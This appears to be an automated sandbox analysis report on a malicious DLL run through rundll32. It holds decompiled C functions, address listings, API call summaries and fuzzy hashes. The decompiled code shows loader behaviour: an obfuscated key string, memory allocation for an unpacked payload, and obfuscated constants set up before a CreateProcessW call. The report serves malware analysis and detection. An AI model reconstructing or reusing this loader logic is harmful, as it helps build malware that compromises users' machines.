                                                                                                                                                                            				E10016A10(_t64, _t78, _t79, _v12, 0x10032098, _v36);
                                                                                                                                                                            				_t68 =  *0x10056f04; // 0x730f
                                                                                                                                                                            				_v16 = E1001703B(_t64, _v36, _t78, _t79, _t68);
                                                                                                                                                                            				E10002FA0(_t95, _v16, "vzyxQQjtnPpM1kMtP2^c)toAOgGzJnA(x4n)mZV?Zgqbqls>&28Kb303hUncVaad@?N*A%W2eBhDNd+m_Bl2cFznqh*vrDpHPGj%?_!pbLp", 0x6c);
                                                                                                                                                                            				E10004F00(_v16, _v12, _v36);
                                                                                                                                                                            				_t56 = E10002D20(0x10058ebc, _v12, _v36); // executed
                                                                                                                                                                            				 *0x10058edc = _t56;
                                                                                                                                                                            				ShowWindow(0, _v40);
                                                                                                                                                                            				return 1;
                                                                                                                                                                            			}























                                                                                                                                                                            0x100088e0
                                                                                                                                                                            0x100088e0
                                                                                                                                                                            0x100088e0
                                                                                                                                                                            0x100088e9
                                                                                                                                                                            0x100088ef
                                                                                                                                                                            0x100088f5
                                                                                                                                                                            0x100088f8
                                                                                                                                                                            0x10008901
                                                                                                                                                                            0x10008906
                                                                                                                                                                            0x1000890d
                                                                                                                                                                            0x10008914
                                                                                                                                                                            0x1000891b
                                                                                                                                                                            0x10008922
                                                                                                                                                                            0x10008929
                                                                                                                                                                            0x10008930
                                                                                                                                                                            0x10008966
                                                                                                                                                                            0x1000896b
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10008973
                                                                                                                                                                            0x10008932
                                                                                                                                                                            0x1000893c
                                                                                                                                                                            0x10008946
                                                                                                                                                                            0x10008950
                                                                                                                                                                            0x1000895a
                                                                                                                                                                            0x1000897a
                                                                                                                                                                            0x10008981
                                                                                                                                                                            0x10008988
                                                                                                                                                                            0x1000898f
                                                                                                                                                                            0x10008996
                                                                                                                                                                            0x1000899d
                                                                                                                                                                            0x100089a4
                                                                                                                                                                            0x100089b8
                                                                                                                                                                            0x100089c8
                                                                                                                                                                            0x100089dc
                                                                                                                                                                            0x100089f2
                                                                                                                                                                            0x100089f7
                                                                                                                                                                            0x100089fe
                                                                                                                                                                            0x10008a3b
                                                                                                                                                                            0x10008a51
                                                                                                                                                                            0x10008a51
                                                                                                                                                                            0x10008a63
                                                                                                                                                                            0x10008a00
                                                                                                                                                                            0x10008a2b
                                                                                                                                                                            0x10008a31
                                                                                                                                                                            0x10008a31
                                                                                                                                                                            0x10008a73
                                                                                                                                                                            0x10008a7b
                                                                                                                                                                            0x10008a8a
                                                                                                                                                                            0x10008a98
                                                                                                                                                                            0x10008aac
                                                                                                                                                                            0x10008ac1
                                                                                                                                                                            0x10008ac6
                                                                                                                                                                            0x10008ad1
                                                                                                                                                                            0x00000000

                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 10008860: _malloc.LIBCMT ref: 1000886B
                                                                                                                                                                            • _printf.LIBCMT ref: 1000896B
                                                                                                                                                                            • VirtualAllocExNuma.KERNELBASE(000000FF,00000000,00024E00,00000000,00000000,00000000), ref: 10008A2B
                                                                                                                                                                            • VirtualAlloc.KERNEL32(00000000,00024E00,00000000,00000000), ref: 10008A5D
                                                                                                                                                                            • _malloc.LIBCMT ref: 10008A82
                                                                                                                                                                            • ShowWindow.USER32(00000000,0044368D,00000000,00024E00), ref: 10008AD1
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000003.00000002.254237600.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                            • Associated: 00000003.00000002.254232913.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254260062.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254269049.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254289924.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254295503.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254300851.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AllocVirtual_malloc$NumaShowWindow_printf
                                                                                                                                                                            • String ID: +';$8192$`/$kernel32.dll$ntdll.dll$vzyxQQjtnPpM1kMtP2^c)toAOgGzJnA(x4n)mZV?Zgqbqls>&28Kb303hUncVaad@?N*A%W2eBhDNd+m_Bl2cFznqh*vrDpHPGj%?_!pbLp
                                                                                                                                                                            • API String ID: 1487653210-3670691644
                                                                                                                                                                            • Opcode ID: 230bbdfcd20e835c4d7365e9bc9cc9309c602f396e76a36ffbf0d77b2387037d
                                                                                                                                                                            • Instruction ID: 74e036033439e47f0f6271ee42a165f027743cdfe4c2c4d01037afcb8f86e406
                                                                                                                                                                            • Opcode Fuzzy Hash: 230bbdfcd20e835c4d7365e9bc9cc9309c602f396e76a36ffbf0d77b2387037d
                                                                                                                                                                            • Instruction Fuzzy Hash: FE5141F5D00214AFEB00CF90EC96BAE77B4FB48344F144528E909BB345E775A6448BA2
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            C-Code - Quality: 80%
                                                                                                                                                                            			E10013A9B() {
                                                                                                                                                                            				struct _CRITICAL_SECTION* _v4;
                                                                                                                                                                            				char _v28;
                                                                                                                                                                            				char _v36;
                                                                                                                                                                            				char _v44;
                                                                                                                                                                            				intOrPtr _v56;
                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                            				intOrPtr __ecx;
                                                                                                                                                                            				signed int __edi;
                                                                                                                                                                            				void* __esi;
                                                                                                                                                                            				void* __ebp;
                                                                                                                                                                            				struct _CRITICAL_SECTION* _t39;
                                                                                                                                                                            				intOrPtr _t40;
                                                                                                                                                                            				void* _t41;
                                                                                                                                                                            				long _t44;
                                                                                                                                                                            				void* _t45;
                                                                                                                                                                            				signed int* _t51;
                                                                                                                                                                            				intOrPtr _t64;
                                                                                                                                                                            				long _t68;
                                                                                                                                                                            				void* _t69;
                                                                                                                                                                            				void* _t70;
                                                                                                                                                                            				signed int _t72;
                                                                                                                                                                            				intOrPtr _t78;
                                                                                                                                                                            				signed int _t82;
                                                                                                                                                                            				void* _t86;
                                                                                                                                                                            				signed int _t88;
                                                                                                                                                                            				void* _t90;
                                                                                                                                                                            				void* _t91;
                                                                                                                                                                            				void* _t93;
                                                                                                                                                                            
                                                                                                                                                                            				_push(_t72);
                                                                                                                                                                            				_push(_t69);
                                                                                                                                                                            				_push(_t88);
                                                                                                                                                                            				_t86 = _t72;
                                                                                                                                                                            				_t1 = _t86 + 0x1c; // 0x1005aaa8
                                                                                                                                                                            				_t39 = _t1;
                                                                                                                                                                            				_v4 = _t39;
                                                                                                                                                                            				EnterCriticalSection(_t39);
                                                                                                                                                                            				_t3 = _t86 + 4; // 0x20
                                                                                                                                                                            				_t40 =  *_t3;
                                                                                                                                                                            				_t4 = _t86 + 8; // 0x3
                                                                                                                                                                            				_t82 =  *_t4;
                                                                                                                                                                            				if(_t82 >= _t40) {
                                                                                                                                                                            					L7:
                                                                                                                                                                            					_t82 = 1;
                                                                                                                                                                            					__eflags = _t40 - 1;
                                                                                                                                                                            					if(_t40 <= 1) {
                                                                                                                                                                            						L12:
                                                                                                                                                                            						_t21 = _t40 + 0x20; // 0x40
                                                                                                                                                                            						_t88 = _t21;
                                                                                                                                                                            						_t22 = _t86 + 0x10; // 0xba0680
                                                                                                                                                                            						_t41 =  *_t22;
                                                                                                                                                                            						__eflags = _t41;
                                                                                                                                                                            						if(__eflags != 0) {
                                                                                                                                                                            							_t69 = GlobalHandle(_t41);
                                                                                                                                                                            							GlobalUnlock(_t69);
                                                                                                                                                                            							_t44 = E100134F9(_t72, __eflags, _t88, 8);
                                                                                                                                                                            							_t72 = 0x2002;
                                                                                                                                                                            							_t45 = GlobalReAlloc(_t69, _t44, ??);
                                                                                                                                                                            						} else {
                                                                                                                                                                            							_t68 = E100134F9(_t72, __eflags, _t88, 8);
                                                                                                                                                                            							_pop(_t72);
                                                                                                                                                                            							_t45 = GlobalAlloc(2, _t68); // executed
                                                                                                                                                                            						}
                                                                                                                                                                            						__eflags = _t45;
                                                                                                                                                                            						if(_t45 != 0) {
                                                                                                                                                                            							_t70 = GlobalLock(_t45);
                                                                                                                                                                            							_t25 = _t86 + 4; // 0x20
                                                                                                                                                                            							__eflags = _t88 -  *_t25 << 3;
                                                                                                                                                                            							E100174D0(_t82, _t70 +  *_t25 * 8, 0, _t88 -  *_t25 << 3);
                                                                                                                                                                            							 *(_t86 + 4) = _t88;
                                                                                                                                                                            							 *(_t86 + 0x10) = _t70;
                                                                                                                                                                            							goto L20;
                                                                                                                                                                            						} else {
                                                                                                                                                                            							_t23 = _t86 + 0x10; // 0xba0680
                                                                                                                                                                            							_t86 =  *_t23;
                                                                                                                                                                            							__eflags = _t86;
                                                                                                                                                                            							if(_t86 != 0) {
                                                                                                                                                                            								GlobalLock(GlobalHandle(_t86));
                                                                                                                                                                            							}
                                                                                                                                                                            							LeaveCriticalSection(_v4);
                                                                                                                                                                            							_push(_t88);
                                                                                                                                                                            							_t90 = _t93;
                                                                                                                                                                            							_push(_t72);
                                                                                                                                                                            							_v28 = 0x10057168;
                                                                                                                                                                            							E10017C83( &_v28, 0x1002e258);
                                                                                                                                                                            							asm("int3");
                                                                                                                                                                            							_push(_t90);
                                                                                                                                                                            							_t91 = _t93;
                                                                                                                                                                            							_push(_t72);
                                                                                                                                                                            							_v36 = 0x10057200;
                                                                                                                                                                            							E10017C83( &_v36, 0x1002e2b8);
                                                                                                                                                                            							asm("int3");
                                                                                                                                                                            							_push(_t91);
                                                                                                                                                                            							_push(_t72);
                                                                                                                                                                            							_v44 = 0x10057298;
                                                                                                                                                                            							E10017C83( &_v44, 0x1002e2fc);
                                                                                                                                                                            							asm("int3");
                                                                                                                                                                            							_push(4);
                                                                                                                                                                            							E10017BC1(E10027DEC, _t69, _t82, _t86);
                                                                                                                                                                            							_t78 = E10013965(0x104);
                                                                                                                                                                            							_v56 = _t78;
                                                                                                                                                                            							_t64 = 0;
                                                                                                                                                                            							_v44 = 0;
                                                                                                                                                                            							if(_t78 != 0) {
                                                                                                                                                                            								_t64 = E1000CF71(_t78);
                                                                                                                                                                            							}
                                                                                                                                                                            							return E10017C60(_t64);
                                                                                                                                                                            						}
                                                                                                                                                                            					} else {
                                                                                                                                                                            						_t18 = _t86 + 0x10; // 0xba0680
                                                                                                                                                                            						_t72 =  *_t18 + 8;
                                                                                                                                                                            						__eflags = _t72;
                                                                                                                                                                            						while(1) {
                                                                                                                                                                            							__eflags =  *_t72 & 0x00000001;
                                                                                                                                                                            							if(( *_t72 & 0x00000001) == 0) {
                                                                                                                                                                            								break;
                                                                                                                                                                            							}
                                                                                                                                                                            							_t82 = _t82 + 1;
                                                                                                                                                                            							_t72 = _t72 + 8;
                                                                                                                                                                            							__eflags = _t82 - _t40;
                                                                                                                                                                            							if(_t82 < _t40) {
                                                                                                                                                                            								continue;
                                                                                                                                                                            							}
                                                                                                                                                                            							break;
                                                                                                                                                                            						}
                                                                                                                                                                            						__eflags = _t82 - _t40;
                                                                                                                                                                            						if(_t82 < _t40) {
                                                                                                                                                                            							goto L20;
                                                                                                                                                                            						} else {
                                                                                                                                                                            							goto L12;
                                                                                                                                                                            						}
                                                                                                                                                                            					}
                                                                                                                                                                            				} else {
                                                                                                                                                                            					_t13 = __esi + 0x10; // 0xba0680
                                                                                                                                                                            					__ecx =  *_t13;
                                                                                                                                                                            					__eflags =  *(__ecx + __edi * 8) & 0x00000001;
                                                                                                                                                                            					if(( *(__ecx + __edi * 8) & 0x00000001) == 0) {
                                                                                                                                                                            						L20:
                                                                                                                                                                            						_t30 = _t86 + 0xc; // 0x3
                                                                                                                                                                            						__eflags = _t82 -  *_t30;
                                                                                                                                                                            						if(_t82 >=  *_t30) {
                                                                                                                                                                            							_t31 = _t82 + 1; // 0x4
                                                                                                                                                                            							 *((intOrPtr*)(_t86 + 0xc)) = _t31;
                                                                                                                                                                            						}
                                                                                                                                                                            						_t33 = _t86 + 0x10; // 0xba0680
                                                                                                                                                                            						_t51 =  *_t33 + _t82 * 8;
                                                                                                                                                                            						 *_t51 =  *_t51 | 0x00000001;
                                                                                                                                                                            						__eflags =  *_t51;
                                                                                                                                                                            						_t37 = _t82 + 1; // 0x4
                                                                                                                                                                            						 *(_t86 + 8) = _t37;
                                                                                                                                                                            						LeaveCriticalSection(_v4);
                                                                                                                                                                            						return _t82;
                                                                                                                                                                            					} else {
                                                                                                                                                                            						goto L7;
                                                                                                                                                                            					}
                                                                                                                                                                            				}
                                                                                                                                                                            			}































                                                                                                                                                                            0x10013a9b
                                                                                                                                                                            0x10013a9c
                                                                                                                                                                            0x10013a9d
                                                                                                                                                                            0x10013a9f
                                                                                                                                                                            0x10013aa1
                                                                                                                                                                            0x10013aa1
                                                                                                                                                                            0x10013aa6
                                                                                                                                                                            0x10013aaa
                                                                                                                                                                            0x10013ab0
                                                                                                                                                                            0x10013ab0
                                                                                                                                                                            0x10013ab3
                                                                                                                                                                            0x10013ab3
                                                                                                                                                                            0x10013ab8
                                                                                                                                                                            0x10013ac7
                                                                                                                                                                            0x10013ac9
                                                                                                                                                                            0x10013aca
                                                                                                                                                                            0x10013acc
                                                                                                                                                                            0x10013ae9
                                                                                                                                                                            0x10013ae9
                                                                                                                                                                            0x10013ae9
                                                                                                                                                                            0x10013aec
                                                                                                                                                                            0x10013aec
                                                                                                                                                                            0x10013aef
                                                                                                                                                                            0x10013af1
                                                                                                                                                                            0x10013b0f
                                                                                                                                                                            0x10013b12
                                                                                                                                                                            0x10013b20
                                                                                                                                                                            0x10013b26
                                                                                                                                                                            0x10013b29
                                                                                                                                                                            0x10013af3
                                                                                                                                                                            0x10013af6
                                                                                                                                                                            0x10013afc
                                                                                                                                                                            0x10013b00
                                                                                                                                                                            0x10013b00
                                                                                                                                                                            0x10013b2f
                                                                                                                                                                            0x10013b31
                                                                                                                                                                            0x10013b5e
                                                                                                                                                                            0x10013b60
                                                                                                                                                                            0x10013b67
                                                                                                                                                                            0x10013b71
                                                                                                                                                                            0x10013b79
                                                                                                                                                                            0x10013b7c
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10013b33
                                                                                                                                                                            0x10013b33
                                                                                                                                                                            0x10013b33
                                                                                                                                                                            0x10013b36
                                                                                                                                                                            0x10013b38
                                                                                                                                                                            0x10013b42
                                                                                                                                                                            0x10013b42
                                                                                                                                                                            0x10013b4c
                                                                                                                                                                            0x1000a0a7
                                                                                                                                                                            0x1000a0a8
                                                                                                                                                                            0x1000a0aa
                                                                                                                                                                            0x1000a0b4
                                                                                                                                                                            0x1000a0bb
                                                                                                                                                                            0x1000a0c0
                                                                                                                                                                            0x1000a0c1
                                                                                                                                                                            0x1000a0c2
                                                                                                                                                                            0x1000a0c4
                                                                                                                                                                            0x1000a0ce
                                                                                                                                                                            0x1000a0d5
                                                                                                                                                                            0x1000a0da
                                                                                                                                                                            0x1000a0db
                                                                                                                                                                            0x1000a0de
                                                                                                                                                                            0x1000a0e8
                                                                                                                                                                            0x1000a0ef
                                                                                                                                                                            0x1000a0f4
                                                                                                                                                                            0x1000a0f5
                                                                                                                                                                            0x1000a0fc
                                                                                                                                                                            0x1000a10b
                                                                                                                                                                            0x1000a10d
                                                                                                                                                                            0x1000a110
                                                                                                                                                                            0x1000a114
                                                                                                                                                                            0x1000a117
                                                                                                                                                                            0x1000a119
                                                                                                                                                                            0x1000a119
                                                                                                                                                                            0x1000a123
                                                                                                                                                                            0x1000a123
                                                                                                                                                                            0x10013ace
                                                                                                                                                                            0x10013ace
                                                                                                                                                                            0x10013ad1
                                                                                                                                                                            0x10013ad1
                                                                                                                                                                            0x10013ad4
                                                                                                                                                                            0x10013ad4
                                                                                                                                                                            0x10013ad7
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10013ad9
                                                                                                                                                                            0x10013ada
                                                                                                                                                                            0x10013add
                                                                                                                                                                            0x10013adf
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10013adf
                                                                                                                                                                            0x10013ae1
                                                                                                                                                                            0x10013ae3
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10013ae3
                                                                                                                                                                            0x10013aba
                                                                                                                                                                            0x10013aba
                                                                                                                                                                            0x10013aba
                                                                                                                                                                            0x10013abd
                                                                                                                                                                            0x10013ac1
                                                                                                                                                                            0x10013b7f
                                                                                                                                                                            0x10013b7f
                                                                                                                                                                            0x10013b7f
                                                                                                                                                                            0x10013b82
                                                                                                                                                                            0x10013b84
                                                                                                                                                                            0x10013b87
                                                                                                                                                                            0x10013b87
                                                                                                                                                                            0x10013b8a
                                                                                                                                                                            0x10013b91
                                                                                                                                                                            0x10013b94
                                                                                                                                                                            0x10013b94
                                                                                                                                                                            0x10013b97
                                                                                                                                                                            0x10013b9a
                                                                                                                                                                            0x10013b9d
                                                                                                                                                                            0x10013baa
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10013ac1

                                                                                                                                                                            APIs
                                                                                                                                                                            • EnterCriticalSection.KERNEL32(1005AAA8,?,?,?,?,1005AA8C,10013DEC,00000004,1000D5FB,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB,00000004), ref: 10013AAA
                                                                                                                                                                            • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,1005AA8C,10013DEC,00000004,1000D5FB,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB), ref: 10013B00
                                                                                                                                                                            • GlobalHandle.KERNEL32(00BA0680), ref: 10013B09
                                                                                                                                                                            • GlobalUnlock.KERNEL32(00000000,?,?,?,?,1005AA8C,10013DEC,00000004,1000D5FB,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB,00000004), ref: 10013B12
                                                                                                                                                                            • GlobalReAlloc.KERNEL32 ref: 10013B29
                                                                                                                                                                            • GlobalHandle.KERNEL32(00BA0680), ref: 10013B3B
                                                                                                                                                                            • GlobalLock.KERNEL32 ref: 10013B42
                                                                                                                                                                            • LeaveCriticalSection.KERNEL32(?,?,?,?,?,1005AA8C,10013DEC,00000004,1000D5FB,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB,00000004), ref: 10013B4C
                                                                                                                                                                            • GlobalLock.KERNEL32 ref: 10013B58
                                                                                                                                                                            • _memset.LIBCMT ref: 10013B71
                                                                                                                                                                            • LeaveCriticalSection.KERNEL32(?), ref: 10013B9D
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000003.00000002.254237600.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                            • Associated: 00000003.00000002.254232913.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254260062.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254269049.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254289924.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254295503.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254300851.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock_memset
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 496899490-0
                                                                                                                                                                            • Opcode ID: db40230195121c03edd1d9de773089a9b398076d37fb16ef380e98a53d4696a6
                                                                                                                                                                            • Instruction ID: d2dedea389880cd6532a8cc41d1f31ca5a81082a511f3f96b23d25218acb7329
                                                                                                                                                                            • Opcode Fuzzy Hash: db40230195121c03edd1d9de773089a9b398076d37fb16ef380e98a53d4696a6
                                                                                                                                                                            • Instruction Fuzzy Hash: 5F31C1312043129FE720CF34CC8DA2A77E9FF84280B12891DE996C7651EB30F885CB10
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            C-Code - Quality: 27%
                                                                                                                                                                            			E10016380(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                                            				intOrPtr* _t10;
                                                                                                                                                                            				intOrPtr _t13;
                                                                                                                                                                            				intOrPtr _t23;
                                                                                                                                                                            				void* _t25;
                                                                                                                                                                            
                                                                                                                                                                            				_push(0xc);
                                                                                                                                                                            				_push(0x1002f780);
                                                                                                                                                                            				_t8 = E1001984C(__ebx, __edi, __esi);
                                                                                                                                                                            				_t23 =  *((intOrPtr*)(_t25 + 8));
                                                                                                                                                                            				if(_t23 == 0) {
                                                                                                                                                                            					L9:
                                                                                                                                                                            					return E10019891(_t8);
                                                                                                                                                                            				}
                                                                                                                                                                            				if( *0x1005c984 != 3) {
                                                                                                                                                                            					_push(_t23);
                                                                                                                                                                            					L7:
                                                                                                                                                                            					_push(0);
                                                                                                                                                                            					_t8 = RtlFreeHeap( *0x1005ad4c); // executed
                                                                                                                                                                            					_t31 = _t8;
                                                                                                                                                                            					if(_t8 == 0) {
                                                                                                                                                                            						_t10 = E10017D62(_t31);
                                                                                                                                                                            						 *_t10 = E10017D27(GetLastError());
                                                                                                                                                                            					}
                                                                                                                                                                            					goto L9;
                                                                                                                                                                            				}
                                                                                                                                                                            				E1001A549(4);
                                                                                                                                                                            				 *(_t25 - 4) =  *(_t25 - 4) & 0x00000000;
                                                                                                                                                                            				_t13 = E1001A5C2(_t23);
                                                                                                                                                                            				 *((intOrPtr*)(_t25 - 0x1c)) = _t13;
                                                                                                                                                                            				if(_t13 != 0) {
                                                                                                                                                                            					_push(_t23);
                                                                                                                                                                            					_push(_t13);
                                                                                                                                                                            					E1001A5ED();
                                                                                                                                                                            				}
                                                                                                                                                                            				 *(_t25 - 4) = 0xfffffffe;
                                                                                                                                                                            				_t8 = E100163D6();
                                                                                                                                                                            				if( *((intOrPtr*)(_t25 - 0x1c)) != 0) {
                                                                                                                                                                            					goto L9;
                                                                                                                                                                            				} else {
                                                                                                                                                                            					_push( *((intOrPtr*)(_t25 + 8)));
                                                                                                                                                                            					goto L7;
                                                                                                                                                                            				}
                                                                                                                                                                            			}







                                                                                                                                                                            0x10016380
                                                                                                                                                                            0x10016382
                                                                                                                                                                            0x10016387
                                                                                                                                                                            0x1001638c
                                                                                                                                                                            0x10016391
                                                                                                                                                                            0x10016408
                                                                                                                                                                            0x1001640d
                                                                                                                                                                            0x1001640d
                                                                                                                                                                            0x1001639a
                                                                                                                                                                            0x100163df
                                                                                                                                                                            0x100163e0
                                                                                                                                                                            0x100163e0
                                                                                                                                                                            0x100163e8
                                                                                                                                                                            0x100163ee
                                                                                                                                                                            0x100163f0
                                                                                                                                                                            0x100163f2
                                                                                                                                                                            0x10016405
                                                                                                                                                                            0x10016407
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x100163f0
                                                                                                                                                                            0x1001639e
                                                                                                                                                                            0x100163a4
                                                                                                                                                                            0x100163a9
                                                                                                                                                                            0x100163af
                                                                                                                                                                            0x100163b4
                                                                                                                                                                            0x100163b6
                                                                                                                                                                            0x100163b7
                                                                                                                                                                            0x100163b8
                                                                                                                                                                            0x100163be
                                                                                                                                                                            0x100163bf
                                                                                                                                                                            0x100163c6
                                                                                                                                                                            0x100163cf
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x100163d1
                                                                                                                                                                            0x100163d1
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x100163d1

                                                                                                                                                                            APIs
                                                                                                                                                                            • __lock.LIBCMT ref: 1001639E
                                                                                                                                                                              • Part of subcall function 1001A549: __mtinitlocknum.LIBCMT ref: 1001A55D
                                                                                                                                                                              • Part of subcall function 1001A549: __amsg_exit.LIBCMT ref: 1001A569
                                                                                                                                                                              • Part of subcall function 1001A549: EnterCriticalSection.KERNEL32(00000001,00000001,?,1001C014,0000000D,1002FA58,00000008,1001C106,00000001,?,?,00000001,?,?,10017AE8,00000001), ref: 1001A571
                                                                                                                                                                            • ___sbh_find_block.LIBCMT ref: 100163A9
                                                                                                                                                                            • ___sbh_free_block.LIBCMT ref: 100163B8
                                                                                                                                                                            • RtlFreeHeap.NTDLL(00000000,?,1002F780,0000000C,1001BF6A,00000000,?,1001E73B,?,00000001,00000001,1001A4D3,00000018,1002F8C0,0000000C,1001A562), ref: 100163E8
                                                                                                                                                                            • GetLastError.KERNEL32(?,1001E73B,?,00000001,00000001,1001A4D3,00000018,1002F8C0,0000000C,1001A562,00000001,00000001,?,1001C014,0000000D,1002FA58), ref: 100163F9
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000003.00000002.254237600.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                            • Associated: 00000003.00000002.254232913.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254260062.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254269049.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254289924.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254295503.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254300851.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2714421763-0
                                                                                                                                                                            • Opcode ID: 933a214dfe2b721a1172918ae6127c9818b4b1158d9b2876c596c2397cc5b652
                                                                                                                                                                            • Instruction ID: 632ebcc47bfd7d50c2ae726889ea94072d2ceb4c664f4e9832d4c107bd8c1e1e
                                                                                                                                                                            • Opcode Fuzzy Hash: 933a214dfe2b721a1172918ae6127c9818b4b1158d9b2876c596c2397cc5b652
                                                                                                                                                                            • Instruction Fuzzy Hash: EE01D635805326EBEF20DBB4AC0AB9D3BF4EF053A0F214109F554AE091CB34EAC19A64
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 225 4762c24-4762d09 call 475fe29 call 474eb52 CreateProcessW
                                                                                                                                                                            C-Code - Quality: 51%
                                                                                                                                                                            			E04762C24(WCHAR* __ecx, void* __edx, intOrPtr _a12, intOrPtr _a20, int _a24, intOrPtr _a28, struct _STARTUPINFOW* _a32, intOrPtr _a40, intOrPtr _a44, WCHAR* _a52, struct _PROCESS_INFORMATION* _a56) {
                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                            				signed int _v12;
                                                                                                                                                                            				signed int _v16;
                                                                                                                                                                            				signed int _v20;
                                                                                                                                                                            				struct _SECURITY_ATTRIBUTES* _v24;
                                                                                                                                                                            				struct _SECURITY_ATTRIBUTES* _v28;
                                                                                                                                                                            				intOrPtr _v32;
                                                                                                                                                                            				void* _t49;
                                                                                                                                                                            				int _t56;
                                                                                                                                                                            				WCHAR* _t60;
                                                                                                                                                                            
                                                                                                                                                                            				_push(_a56);
                                                                                                                                                                            				_t60 = __ecx;
                                                                                                                                                                            				_push(_a52);
                                                                                                                                                                            				_push(0);
                                                                                                                                                                            				_push(_a44);
                                                                                                                                                                            				_push(_a40);
                                                                                                                                                                            				_push(0);
                                                                                                                                                                            				_push(_a32);
                                                                                                                                                                            				_push(_a28);
                                                                                                                                                                            				_push(_a24);
                                                                                                                                                                            				_push(_a20);
                                                                                                                                                                            				_push(0);
                                                                                                                                                                            				_push(_a12);
                                                                                                                                                                            				_push(0);
                                                                                                                                                                            				_push(0);
                                                                                                                                                                            				_push(__ecx);
                                                                                                                                                                            				E0475FE29(_t49);
                                                                                                                                                                            				_v32 = 0x534833;
                                                                                                                                                                            				_v28 = 0;
                                                                                                                                                                            				_v24 = 0;
                                                                                                                                                                            				_v8 = 0x70adbe;
                                                                                                                                                                            				_v8 = _v8 >> 5;
                                                                                                                                                                            				_v8 = _v8 << 0xa;
                                                                                                                                                                            				_v8 = _v8 | 0x1d11c356;
                                                                                                                                                                            				_v8 = _v8 ^ 0x1f145645;
                                                                                                                                                                            				_v20 = 0xecea8a;
                                                                                                                                                                            				_v20 = _v20 | 0x5baa72b8;
                                                                                                                                                                            				_v20 = _v20 ^ 0x5be1d11d;
                                                                                                                                                                            				_v16 = 0x76217f;
                                                                                                                                                                            				_v16 = _v16 >> 0x10;
                                                                                                                                                                            				_v16 = _v16 | 0xe98780dc;
                                                                                                                                                                            				_v16 = _v16 ^ 0xe98c1e91;
